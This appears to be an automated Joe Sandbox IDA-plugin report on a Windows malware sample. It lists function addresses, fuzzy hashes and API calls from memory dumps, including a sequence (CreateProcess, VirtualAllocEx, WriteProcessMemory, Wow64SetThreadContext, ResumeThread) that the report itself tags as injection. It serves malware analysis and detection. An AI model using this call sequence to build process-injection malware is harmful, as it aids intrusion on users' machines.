Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID: g.D$g.D
API String ID: 963392458-1449590682
Opcode ID: db96efe01dfb6907b77f5e0c624cc09f8caef5bcad8124924594734139d42bb6
Instruction ID: 2c2e1bab61b7e46b4142c7b6ce1c1368e33bd3d5d0909d8b10953e1ed24dad00
Opcode Fuzzy Hash: db96efe01dfb6907b77f5e0c624cc09f8caef5bcad8124924594734139d42bb6
Instruction Fuzzy Hash: 9A914DB1E0065ADFEB10DFA8C8817DDBBB2FF44314F1482A9D849A7250DB749985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 017DB55F Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 017DB7C6

Strings

g.D, xrefs: 017DB77F

Memory Dump Source

Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID: g.D
API String ID: 4139908857-477188214
Opcode ID: 0397f648a2d30bfae4eea07f74c4c1eb66193472fa428cda465392eb2cdda90c
Instruction ID: 2d922b3ba7e70380fa1ad05c1ce9f8805f4601702a309098f5bf01e8e48478ff
Opcode Fuzzy Hash: 0397f648a2d30bfae4eea07f74c4c1eb66193472fa428cda465392eb2cdda90c
Instruction Fuzzy Hash: BF812370A00B098FDB24DF69D14475AFBF1BF89300F148A6ED08ADBA50D734E949CB90

Uniqueness

Uniqueness Score: -1.00%

Function 017D590C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 017D59C9

Strings

g.D, xrefs: 017D594C

Memory Dump Source

Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID: g.D
API String ID: 2289755597-477188214
Opcode ID: 9b175b861ced9a8d005043d1565d87ec00168b55bdf9d50f1e6f82b42ecea4ee
Instruction ID: 6a9304eded8523800e4e2f965030fa8cfcea4a63d68dfaf9a3912f4b42c7b8c6
Opcode Fuzzy Hash: 9b175b861ced9a8d005043d1565d87ec00168b55bdf9d50f1e6f82b42ecea4ee
Instruction Fuzzy Hash: 0841E1B1C0061DCFDB24CFA9C884BDDBBB5BF89304F2481AAD408AB255DB756985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 017D44E4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 017D59C9

Strings

g.D, xrefs: 017D594C

Memory Dump Source

Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID: g.D
API String ID: 2289755597-477188214
Opcode ID: aa12d80de7320e86bae0d474102be16496d42481c0401ad04c89c9d8cfb8ee03
Instruction ID: 3f389a830b3427feead514f03d6378c39e9c268c55a5676018ce1c8361520529
Opcode Fuzzy Hash: aa12d80de7320e86bae0d474102be16496d42481c0401ad04c89c9d8cfb8ee03
Instruction Fuzzy Hash: C941B0B0C0072DCBDB24DFA9C884B9DBBB5BF49304F2480AAD409AB255DB755985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 07B5B902 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07B5F775

Strings

g.D, xrefs: 07B5F732

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID: MessagePost
String ID: g.D
API String ID: 410705778-477188214
Opcode ID: 6d410c0e96dcdf6e877101b75f67d3e3372df09a8239554dff87c9dc72f06c44
Instruction ID: d4040b4ae1d38e51c35828782ca10eeeb8f58d7e08ed424127cb9655246bcaf2
Opcode Fuzzy Hash: 6d410c0e96dcdf6e877101b75f67d3e3372df09a8239554dff87c9dc72f06c44
Instruction Fuzzy Hash: 4031EFF2D083848FDB05CF94C855BEEBFB4EF0A300F05408AD186A7292C639A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07B5D120 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B5D1B8

Strings

g.D, xrefs: 07B5D147

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: g.D
API String ID: 3559483778-477188214
Opcode ID: 152022cc9959779acd84c1f07ceb71a54c755cff8dfb08c09cc614bcb97ec3dc
Instruction ID: 6241e0ab91b954c01594394d8a5910a2bdf7ac454db77015382dfe22b44080ef
Opcode Fuzzy Hash: 152022cc9959779acd84c1f07ceb71a54c755cff8dfb08c09cc614bcb97ec3dc
Instruction Fuzzy Hash: 542157B1A002599FDB10CFA9C980BEEBBF1FF48314F10842AE959A7250C7789954CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 07B5D128 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B5D1B8

Strings

g.D, xrefs: 07B5D147

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: g.D
API String ID: 3559483778-477188214
Opcode ID: 6f2026beb97230b43789ebe3f8f08a7d90afca8758683e0574ad35539b9792be
Instruction ID: e08c951f06993a20a4ec388afe95985783421455090b229fd0b7fa46bf5be511
Opcode Fuzzy Hash: 6f2026beb97230b43789ebe3f8f08a7d90afca8758683e0574ad35539b9792be
Instruction Fuzzy Hash: C52136B19003599FDB10CFAAC885BEEBBF5FF48314F10842AE959A7250C7789944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 07B5CF88 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B5D00E

Strings

g.D, xrefs: 07B5CFAC

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID: ContextThreadWow64
String ID: g.D
API String ID: 983334009-477188214
Opcode ID: 0bfc9aa691f2c4114cf0ef2055d724f82cf614e5825ef33b4f796c85a1505142
Instruction ID: 7e0b7c206b982c9c58e2f99552bee73f78a13d375d5132759645c8c2a968e2d9
Opcode Fuzzy Hash: 0bfc9aa691f2c4114cf0ef2055d724f82cf614e5825ef33b4f796c85a1505142
Instruction Fuzzy Hash: 072138B69003098FDB10DFAAC4857EEBFF4EF48324F14842AD859A7241C7789985CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07B5D211 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B5D298

Strings

g.D, xrefs: 07B5D237

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessRead
String ID: g.D
API String ID: 1726664587-477188214
Opcode ID: 269955d9c7ea6da3731d6b54925bf80494bdcb349aede1e9b48b87ba146483e4
Instruction ID: 5d32c871273a92cdb5db2b3e37ad471946d131de9392d9777d937e812dff00b5
Opcode Fuzzy Hash: 269955d9c7ea6da3731d6b54925bf80494bdcb349aede1e9b48b87ba146483e4
Instruction Fuzzy Hash: 5C2148B19002599FDB10DFA9C980BEEBBF1FF48310F10842EE959A7250C7389545CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07B5D218 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B5D298

Strings

g.D, xrefs: 07B5D237

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessRead
String ID: g.D
API String ID: 1726664587-477188214
Opcode ID: dc3c0b54c1cec9037d1e49ebf2bf941924f7e6250c854f69b5c693e9b7553af9
Instruction ID: f171d3c8dc253448bddc27acf2327543ae45a0adbb5b80f1221b76f844ecd1c7
Opcode Fuzzy Hash: dc3c0b54c1cec9037d1e49ebf2bf941924f7e6250c854f69b5c693e9b7553af9
Instruction Fuzzy Hash: 0F2148B19003599FDB10DFAAC880BEEFBF5FF48310F108429E918A7250C7349544CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 07B5CF90 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B5D00E

Strings

g.D, xrefs: 07B5CFAC

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID: ContextThreadWow64
String ID: g.D
API String ID: 983334009-477188214
Opcode ID: bd37430bb47fd578ed101861a47efc2d4f8d784984b7172cc46bd82d451c95c9
Instruction ID: 39ebe217fa27caa3c5b83bfb6825ac19344abafeb0beaa65ef03f612cd5da321
Opcode Fuzzy Hash: bd37430bb47fd578ed101861a47efc2d4f8d784984b7172cc46bd82d451c95c9
Instruction Fuzzy Hash: C52129B19003098FDB10DFAAC485BEEBBF4EF48324F148429D559A7240C7789985CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 017DDA40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017DDAC7

Strings

g.D, xrefs: 017DDA5F

Memory Dump Source

Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd

Similarity

API ID: DuplicateHandle
String ID: g.D
API String ID: 3793708945-477188214
Opcode ID: cdf6cc4d8987bc199e137121ea43352009239c275a88b4eab5148611a5f52114
Instruction ID: 5e23a58c4aab48d23d54fc55cb37891170c4f7dd738261b841d94698e49b6d76
Opcode Fuzzy Hash: cdf6cc4d8987bc199e137121ea43352009239c275a88b4eab5148611a5f52114
Instruction Fuzzy Hash: 3A21E4B59002489FDB10CF9AD984ADEFFF4EB48320F14841AE914A7350D374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07B5D061 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B5D0D6

Strings

g.D, xrefs: 07B5D07F

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID: g.D
API String ID: 4275171209-477188214
Opcode ID: 67ec9d5829e28ea3046455eff1d91fb5bc6331a76e9f225cbf7e9b7522f2e010
Instruction ID: 1275d4b1bcaab4486507db6c615962074c8bf7940df7434a0b443226b3a7492f
Opcode Fuzzy Hash: 67ec9d5829e28ea3046455eff1d91fb5bc6331a76e9f225cbf7e9b7522f2e010
Instruction Fuzzy Hash: BD1156B29002498FDB20DFA9C844BEEBFF5EB88324F24841AE459A7250C7359544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 017DAFB0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,017DB841,00000800,00000000,00000000), ref: 017DBA52

Strings

g.D, xrefs: 017DBA07

Memory Dump Source

Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad
String ID: g.D
API String ID: 1029625771-477188214
Opcode ID: 8f68573fabef359e0465dd59e22177b561090b6095aaa65613c64d527436c60f
Instruction ID: b7225f3fcbc28f784dde8204d0928cedea27925fd707f683dd598096972d955b
Opcode Fuzzy Hash: 8f68573fabef359e0465dd59e22177b561090b6095aaa65613c64d527436c60f
Instruction Fuzzy Hash: 181112B69043498FDB20CF9AC484ADEFBF4EB89310F11846EE519A7210C375AA45CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07B5D068 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B5D0D6

Strings

g.D, xrefs: 07B5D07F

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID: g.D
API String ID: 4275171209-477188214
Opcode ID: d51533d8d1992cea0813406eee04740be27755e9bb03d16d07bc4b684f8938da
Instruction ID: 7e193f0755ee8bf4e56f827394de0a458fb15b697cbd7d467d68cdb09eff2f40
Opcode Fuzzy Hash: d51533d8d1992cea0813406eee04740be27755e9bb03d16d07bc4b684f8938da
Instruction Fuzzy Hash: F91167B29002499FDB10DFAAC844BEEFFF5EF88324F248419E519A7250C735A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 017DB9E1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,017DB841,00000800,00000000,00000000), ref: 017DBA52

Strings

g.D, xrefs: 017DBA07

Memory Dump Source

Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad
String ID: g.D
API String ID: 1029625771-477188214
Opcode ID: e3e38ab16e41473324f74c6ff4038d6b1b9a41c4294ee573db6b8d447c26fda1
Instruction ID: 874981bd1f9c54b3d707fa3f17f9b4882d7a5043b0ff19f70676d4abf004d09b
Opcode Fuzzy Hash: e3e38ab16e41473324f74c6ff4038d6b1b9a41c4294ee573db6b8d447c26fda1
Instruction Fuzzy Hash: 4C11F0B6D002498FDB20CF9AC584BDEFBF4AF88314F15842AE519AB610C375A645CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07B5CED9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07B5CF42

Strings

g.D, xrefs: 07B5CEF7

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID: ResumeThread
String ID: g.D
API String ID: 947044025-477188214
Opcode ID: 2c0774ecde76638b93a5cb2aa4946d75471cf519e6a8800795a18fff7b441f21
Instruction ID: 011e5e2264bf52ff7a37d1f4661fdfa59046d311eaf82669b63221ec2ea86317
Opcode Fuzzy Hash: 2c0774ecde76638b93a5cb2aa4946d75471cf519e6a8800795a18fff7b441f21
Instruction Fuzzy Hash: 7A1146B19002498FDB20DFA9C4447EEBFF5EB88324F20845AD459A7250C634A988CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 07B5CEE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07B5CF42

Strings

g.D, xrefs: 07B5CEF7

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID: ResumeThread
String ID: g.D
API String ID: 947044025-477188214
Opcode ID: 417393b27289fa065aab01f66e30f9f344ccf995c8aee3a36c5b20ee2e1aa8f1
Instruction ID: 5a9dd5ad4b0e8c2876c7241a9eb7ceb4121af8b44b4e82548b329e77b1514908
Opcode Fuzzy Hash: 417393b27289fa065aab01f66e30f9f344ccf995c8aee3a36c5b20ee2e1aa8f1
Instruction Fuzzy Hash: BF1166B19003498FDB20DFAAC4447EEFFF5EB88324F208469D519A7240CB34A948CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 017DB760 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 017DB7C6

Strings

g.D, xrefs: 017DB77F

Memory Dump Source

Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID: g.D
API String ID: 4139908857-477188214
Opcode ID: d058271c61b1a6a3509dea47c6d1dced5d27f2b1d50fe7df06a1252691dd11ac
Instruction ID: 7c074dcc104afd3bfdc0032cf9d085f8592faf8f6dc906efb3ae75207942f4bf
Opcode Fuzzy Hash: d058271c61b1a6a3509dea47c6d1dced5d27f2b1d50fe7df06a1252691dd11ac
Instruction Fuzzy Hash: B01110B5C002498FDB10CF9AC444ADEFBF8EF89324F15846AD419B7610C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07B5B990 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07B5F775

Strings

g.D, xrefs: 07B5F732

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID: MessagePost
String ID: g.D
API String ID: 410705778-477188214
Opcode ID: 7f339bb08aceb1531a0c253340e21cbad5e86af4885096e42e6969b1d9580310
Instruction ID: d0f70014e35ee1e7acd2bcb4b921f135eaddeddfc43e19f161a67a544daa7aef
Opcode Fuzzy Hash: 7f339bb08aceb1531a0c253340e21cbad5e86af4885096e42e6969b1d9580310
Instruction Fuzzy Hash: DB1106B5800349DFDB10DF99C885BEEFBF8EB48314F108459E958A7210C375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0173D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684736393.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_173d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 723f3917156e97bf6863fef109bbf6f5d63beb2cb085b9f7d13fc412515d70e4
Instruction ID: afd667c243851079e6d41404ffbca1caacc0ea3972904d5b31ae2cbccd7afdb1
Opcode Fuzzy Hash: 723f3917156e97bf6863fef109bbf6f5d63beb2cb085b9f7d13fc412515d70e4
Instruction Fuzzy Hash: AD2100B1100204DFDB21DF98D980B66FF65FBC8324F60C1A9ED090A257C336E456CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0174D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684796955.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_174d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9f96eb9e7617f8a8397857283d8c879c280f9722ec4470f218b5d5a31e3a75f
Instruction ID: f0ea6e7d381e20cf83cfbd8003e4b0fe9d7abcf44efa2b3a77c1026c64d7a7c2
Opcode Fuzzy Hash: b9f96eb9e7617f8a8397857283d8c879c280f9722ec4470f218b5d5a31e3a75f
Instruction Fuzzy Hash: 9B212971608200DFDB15DF98D5C4B26FBA5FB94324F20C6ADE9894B356C336D446CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0174D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684796955.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_174d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b0db5519dd578bf57e4afa1ef590e5ff1f576aa476261fa107f3bb74507fa7
Instruction ID: 295e3d9d07176bf1a48e4bab82c00f939091afecc1d0b98b254aae8f1d4fb2de
Opcode Fuzzy Hash: a4b0db5519dd578bf57e4afa1ef590e5ff1f576aa476261fa107f3bb74507fa7
Instruction Fuzzy Hash: F1212271604200DFCB25DF98D9C4B26FFA5EB98314F20C5ADD88A4B266C33AD447CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0173D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684736393.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_173d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 64f5268b7fa8b61339e0a31b53d8e37521622c15baf3b6b6a8968f5d7f9b8aa4
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 9D11CA72404280CFDB12CF54D9C4B56BF62FB94224F24C2A9DD090A257C33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0174D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684796955.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_174d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 798c691eb1598b438db1389a38650b52614df392b7124c3705b3babb305877dd
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 4E11D075504280CFDB16CF54D5C4B15FF61FB44314F24C6AED8494B666C33AD40ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0174D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684796955.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_174d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 011d33d17fa2089cf24dc02a4060d06541cd281c3725a179bce855231a52822e
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: A311BB75508280DFDB12CF54C5C4B15FFA1FB84224F24C6AAD8894B296C33AD40ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0173D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684736393.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_173d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac4b846fa0855be34e08c620254798af3bc66d5285ebf06b33a8cbc9493676f5
Instruction ID: c3b2a8c482569276283636514dd4326ec1db9b82d378478bea75504a3eb3f3cb
Opcode Fuzzy Hash: ac4b846fa0855be34e08c620254798af3bc66d5285ebf06b33a8cbc9493676f5
Instruction Fuzzy Hash: 7B01DB710083809AE7325EA9CD84B67FF98EFC1364F58C56AED194E287D779D840CA71

Uniqueness

Uniqueness Score: -1.00%

Function 0173D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684736393.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_173d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1966148f10bb38fc5c30eb3e54df29fd5a28ac67cafe042137cb6a6c206d4566
Instruction ID: 434b6bbf198678fb0c4b483c5338b0624d8990b372c5283a07114f3de849417c
Opcode Fuzzy Hash: 1966148f10bb38fc5c30eb3e54df29fd5a28ac67cafe042137cb6a6c206d4566
Instruction Fuzzy Hash: 3EF062714043849AE7218E5ACC88B62FFA8EB91734F58C45AED084E287C3799844CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 07C40BC9 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689757039.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f701b57253df22a9a69d707320376c57b3d3886048d9df51059c6d6587fb6f8
Instruction ID: 89ff1b0c9fde786f7ad0e3f8f4a98fee76a0028988d4211f89a71fc494710c46
Opcode Fuzzy Hash: 8f701b57253df22a9a69d707320376c57b3d3886048d9df51059c6d6587fb6f8
Instruction Fuzzy Hash: 4FF03CF0E5430ADFDB24DFA9C845BAEBFF4BB08224F1085A9E614E7241E7709645CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07C40B6D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689757039.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38a842c54dc830e37b4341ef1ebfb94eb910970d95a9028321c090d2f5c5bb12
Instruction ID: 5a07389ee67daf92b1bde753afe33b142730dbae3442b27f7912874c1fba9660
Opcode Fuzzy Hash: 38a842c54dc830e37b4341ef1ebfb94eb910970d95a9028321c090d2f5c5bb12
Instruction Fuzzy Hash: C9F0E9F1E542049FD740CFB8A806A9ABFF0AB09228F1045EAE550D7252E3705141CF81

Uniqueness

Uniqueness Score: -1.00%

Function 07C40BD0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689757039.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f1bec34df3d6a77b612d107329c21b6607ec78e39975c45f1347306c7b34be1
